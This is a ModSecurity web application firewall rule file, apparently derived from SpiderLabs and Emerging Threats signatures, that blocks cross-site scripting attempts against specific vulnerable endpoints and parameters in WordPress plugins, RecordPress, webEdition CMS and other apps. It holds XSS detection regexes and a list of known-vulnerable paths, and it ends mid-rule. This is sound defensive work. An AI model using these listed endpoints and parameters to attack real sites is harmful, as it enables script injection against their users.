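SecRule QUERY_STRING|REQUEST_BODY "(?i:relocate\x3d.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Boonex Dolphin relocate Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012380) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Podcast Generator themes.php Cross Site Scripting Attempt
# Chain: the request line contains /core/themes.php, then at least one TX variable name
# matches /XSS.*ARGS:L_failedopentheme/ (presumably set by the generic XSS rules - confirm).
SecRule REQUEST_LINE "@contains /core/themes.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012380,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Podcast Generator themes.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:L_failedopentheme/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Podcast Generator themes.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012394) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt
# Three-step chain: request line contains stconf.nsf/WebMessage, request line contains
# OpenView, and at least one TX variable name matches /XSS.*ARGS:messageString/.
SecRule REQUEST_LINE "@contains stconf.nsf/WebMessage" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012394,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2011-1038'"
SecRule REQUEST_LINE "@contains OpenView" "chain"
SecRule &TX:'/XSS.*ARGS:messageString/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012395) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt
# The chained pattern starts with "stconf.nsf", which normally sits in the URI path.
# QUERY_STRING holds only the part after "?", so with QUERY_STRING the pattern matched
# only when the file name was repeated in the query string or body, and the rule stayed
# silent for ordinary requests to the .nsf path. REQUEST_URI (path plus query string)
# is inspected instead; anything QUERY_STRING would have matched is still covered.
# NOTE(review): t: transformations are declared on the chain starter only; confirm
# whether this chained regex sees decoded input in your configuration.
SecRule REQUEST_LINE "@contains stconf.nsf" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012395,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt',tag:'web-application-attack',tag:'cve,2011-1038'"
SecRule REQUEST_URI|REQUEST_BODY "(?i:stconf.nsf.+(script|onmouse[a-z]+|onkey[a-z]+|onload|onunload|ondragdrop|onblur|onfocus|onclick|ondblclick|onsubmit|onreset|onselect|onchange|style\x3D).+unescape)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IBM Lotus Sametime Server stconf.nsf Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012411) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt
# Chain: plugin path on the request line, then at least one TX variable name matches
# /XSS.*ARGS:post_id/.
SecRule REQUEST_LINE "@contains /wp-content/plugins/iwant-one-ihave-one/updateAJAX.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012411,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS IWantOneButton Wordpress updateAJAX.php post_id Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012418) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 1
# Chain: label_mgr/js_include.php path on the request line, then at least one TX
# variable name matches /XSS.*ARGS:form/.
SecRule REQUEST_LINE "@contains /shipping/methods/fedex_v7/label_mgr/js_include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012418,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 1',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:form/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 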
1',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012419) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 2 SecRule REQUEST_LINE "@contains /shipping/pages/popup_shipping/js_include.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012419,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 2',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:form/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PhreeBooks js_include.php form Parameter Cross Site Scripting Attempt 2',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012428,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule REQUEST_LINE "@contains task=dologin" "chain" SecRule &TX:'/XSS.*ARGS:option/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php option Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt SecRule 
REQUEST_LINE "@contains /wp-content/plugins/xcloner-backup-and-restore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012429,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule &TX:'/XSS.*ARGS:mosmsg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress XCloner Plugin index2.php mosmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012430) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /administrator/components/com_xcloner-backupandrestore/index2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012430,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46582'" SecRule &TX:'/XSS.*ARGS:mosmsg/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla XCloner Component index2.php mosmsg Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012437) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/zotpress/zotpress.image.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012437,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site 
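Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:citation/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Zotpress citation Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012474) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RecordPress rp-menu.php sess_user Parameter Cross Site Scripting Attempt
# Chain: the request line contains /admin/rp-menu.php, then at least one TX variable
# name matches the selector for the parameter _SESSION[sess_user].
# The brackets are escaped in the selector: unescaped, [sess_user] is a regex character
# class (one of s, e, u, r, _), so the selector could not match the literal parameter
# name and the chain never fired for the parameter named in the message.
# NOTE(review): confirm the escaped selector loads cleanly on your ModSecurity build.
# Rule 2012574 tests the same path and parameter; when both match, the critical anomaly
# score is added twice for a single request.
SecRule REQUEST_LINE "@contains /admin/rp-menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012474,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS RecordPress rp-menu.php sess_user Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46798'"
SecRule &TX:'/XSS.*ARGS:_SESSION\[sess_user\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RecordPress rp-menu.php sess_user Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012475) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RecordPress header.php titledesc Parameter Cross Site Scripting Attempt
# Chain: the request line contains /header.php, then at least one TX variable name
# matches the selector for the parameter row[titledesc] (brackets escaped for the same
# reason as in 2012474).
# "@contains /header.php" is not specific to one application: any URI containing that
# string satisfies the first step. Rule 2012573 repeats this path and parameter.
SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012475,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS RecordPress header.php titledesc Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46798'"
SecRule &TX:'/XSS.*ARGS:row\[titledesc\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RecordPress header.php titledesc Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012476) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt
# Chain: plugin path on the request line, then at least one TX variable name matches
# /XSS.*ARGS:type/.
SecRule REQUEST_LINE "@contains /wp-content/plugins/1-flash-gallery/folder.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012476,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:type/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flash Gallery wordpress plugin folder.php type Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012483) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_p_dict Parameter Cross Site Scripting Attempt
# Chain: SpellChecker path on the request line, then at least one TX variable name
# matches /XSS.*ARGS:to_p_dict/.
SecRule REQUEST_LINE "@contains /_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012483,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_p_dict Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:to_p_dict/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_p_dict Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012484) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_r_list Parameter Cross Site Scripting Attempt
# Same path as 2012483; the chained step looks for /XSS.*ARGS:to_r_list/ instead.
SecRule REQUEST_LINE "@contains /_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012484,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_r_list Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:to_r_list/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Wikiwig spell-check-savedicts.php to_r_list Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012573) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RecordPress header.php Cross Site Scripting Attempt
# Same path and parameter as 2012475 (row[titledesc]); brackets escaped so the selector
# matches the literal parameter name rather than a character class. With both rules
# enabled, one matching request adds the critical anomaly score twice.
SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012573,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS RecordPress header.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:row\[titledesc\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RecordPress header.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2012574) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RecordPress header.php rp-menu.php Cross Site Scripting Attempt
# Same path and parameter as 2012474 (_SESSION[sess_user]); brackets escaped so the
# selector matches the literal parameter name rather than a character class.
SecRule REQUEST_LINE "@contains /admin/rp-menu.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012574,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS RecordPress header.php rp-menu.php Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:_SESSION\[sess_user\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RecordPress header.php rp-menu.php Cross Site Scripting 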
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012581) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/lazyest-gallery/lazyest-popup.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012581,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:image/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012582) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /basicstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012582,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46771'" SecRule &TX:'/XSS.*ARGS:AjaxHandler/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012601) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /wp-content/plugins/lazyest-gallery/lazyest-popup.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012601,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:image/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS WordPress Lazyest Gallery Plugin image Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012603) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /basicstats.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012603,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,46771'" SecRule &TX:'/XSS.*ARGS:AjaxHandler/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interleave basicstats.php AjaxHandler Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012678) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webEdition CMS openBrowser.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /openBrowser.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012678,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS webEdition CMS openBrowser.php Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,47047'" SecRule &TX:'/XSS.*ARGS:onload/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webEdition CMS openBrowser.php Cross Site Scripting 
Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012679) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webEdition CMS edit_shop_editorFrameset.php Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /we/include/we_modules/shop/edit_shop_editorFrameset.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012679,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS webEdition CMS edit_shop_editorFrameset.php Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,47047'" SecRule &TX:'/XSS.*ARGS:onload/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webEdition CMS edit_shop_editorFrameset.php Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012680) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webEdition CMS we_transaction Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /we/include/we_modules/messaging/messaging_show_folder_content.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012680,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS webEdition CMS we_transaction Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,47047'" SecRule &TX:'/XSS.*ARGS:we_transaction/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webEdition CMS we_transaction Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012681) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS webEdition CMS shop_artikelid Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains 
/we/include/weTracking/econda/weEcondaImplement.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012681,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS webEdition CMS shop_artikelid Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,47047'" SecRule &TX:'/XSS.*ARGS:shop_artikelid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS webEdition CMS shop_artikelid Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012656) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS eyeOS callback parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /devtools/qooxdoo-sdk/framework/source/resource/qx/test/jsonp_primitive.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012656,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS eyeOS callback parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:callback/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS eyeOS callback parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012658) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OrangeHRM recruitcode parameter Cross Site Script Attempt SecRule REQUEST_LINE "@contains /templates/recruitment/jobVacancy.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012658,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS OrangeHRM recruitcode parameter Cross Site Script Attempt',tag:'web-application-attack',tag:'bugtraq,47046'" SecRule &TX:'/XSS.*ARGS:recruitcode/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS OrangeHRM recruitcode parameter Cross Site Script Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012669) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ClanSphere 'CKEditorFuncNum' parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /mods/ckeditor/filemanager/connectors/php/upload.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012669,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS ClanSphere \'CKEditorFuncNum\' parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:CKEditorFuncNum/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ClanSphere \'CKEditorFuncNum\' parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012670) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PhotoSmash action Parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /plugins/photosmash-galleries/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2012670,rev:1,msg:'SLR: ET WEB_SPECIFIC_APPS PhotoSmash action Parameter Cross Site Scripting Attempt',tag:'web-application-attack'" SecRule &TX:'/XSS.*ARGS:action/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PhotoSmash action Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'" # (2012706) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS vtiger CRM service parameter Cross Site Scripting Attempt SecRule REQUEST_LINE "@contains /vtigerservice.php" 
